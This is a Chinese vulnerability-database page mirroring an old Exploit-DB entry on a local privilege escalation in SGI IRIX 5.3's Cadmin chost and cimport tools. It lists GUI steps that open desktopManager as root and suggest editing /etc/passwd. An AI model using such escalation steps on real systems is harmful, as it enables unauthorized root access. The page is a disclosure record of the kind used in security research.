SGI IRIX 5.3 – ‘Cadmin’ Local Privilege Escalation

SGI IRIX 5.3 – ‘Cadmin’ Local Privilege Escalation

漏洞ID 1053342 漏洞类型
发布时间 1996-08-06 更新时间 1996-08-06
图片[1]-SGI IRIX 5.3 – ‘Cadmin’ Local Privilege Escalation-安全小百科CVE编号 N/A
图片[2]-SGI IRIX 5.3 – ‘Cadmin’ Local Privilege Escalation-安全小百科CNNVD-ID N/A
漏洞平台 IRIX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19268
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/335/info

A vulnerability exists in the chost and cimport programs, as shipped with SGI's Irix 5.x operating system. chost is part of the Cadmin package. By failing to validate the real userid, these programs allow any user to edit protected files, such as the passwd file.

/usr/Cadmin/bin/chost
tools-primary user information
change information
OK (to root password, ie leave blank)
OK (to "password invalid")
Cancel
Double-click any share resource to bring up desktopManager
running as root. Try editing /etc/passwd


/usr/Cadmin/bin/cimport
New
OK
OK
Cancel
double-click any of the mounted filesystems to bring up the desktopManager

相关推荐: wu-ftpd /bin SITE EXEC Misconfiguration Vulnerability

wu-ftpd /bin SITE EXEC Misconfiguration Vulnerability 漏洞ID 1105123 漏洞类型 Configuration Error 发布时间 1995-11-30 更新时间 1995-11-30 CVE编号 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享